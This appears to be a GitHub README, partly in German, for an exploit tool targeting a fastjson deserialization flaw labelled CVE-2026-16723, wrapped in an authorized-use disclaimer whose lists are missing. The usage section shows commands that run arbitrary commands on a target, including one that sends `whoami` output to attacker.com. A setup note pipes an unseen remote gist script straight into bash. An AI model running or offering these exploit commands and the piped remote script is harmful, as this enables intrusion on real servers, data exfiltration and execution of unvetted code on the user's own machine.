
Unterstützen Sie die Wartung dieses Projekts mit PayPal oder durch Scannen des QR-Codes unten.
Verwenden Sie dieses Projekt nur in sicheren und autorisierten Umgebungen wie:
Beispiel-Setup:
git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723
# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
Beispielverwendung:
# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse
# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"
# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000
# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure
# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080
# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50
# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet
Hinweis:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y ausführen, um das verschachtelte Verzeichnis .git zu bereinigen.Ein Repository zum Lernen, Testen und Erforschen von Cybersicherheitskonzepten in kontrollierten Umgebungen.
Dieses Repository dient ausschließlich zu Bildungs- und autorisierten Sicherheitsforschungszwecken.
Es soll Nutzern helfen, Folgendes zu lernen:
Verwenden Sie dieses Repository nur in Umgebungen, in denen Sie die Berechtigung haben, wie:
Unbefugte oder illegale Nutzung ist strengstens untersagt.
Der Autor und die Mitwirkenden sind nicht verantwortlich für Schäden, Missbrauch, rechtliche Probleme oder Verluste, die durch dieses Projekt verursacht werden.
Durch die Nutzung dieses Repositorys stimmen Sie Folgendem zu:
Dieses Projekt ist vorgesehen für:
Bitte befolgen Sie verantwortungsvolle Offenlegungspraktiken (Responsible Disclosure) und halten Sie sich an alle geltenden Gesetze.
Für verantwortungsvolle Offenlegung oder Zusammenarbeit kontaktieren Sie den Repository-Betreuer über GitHub.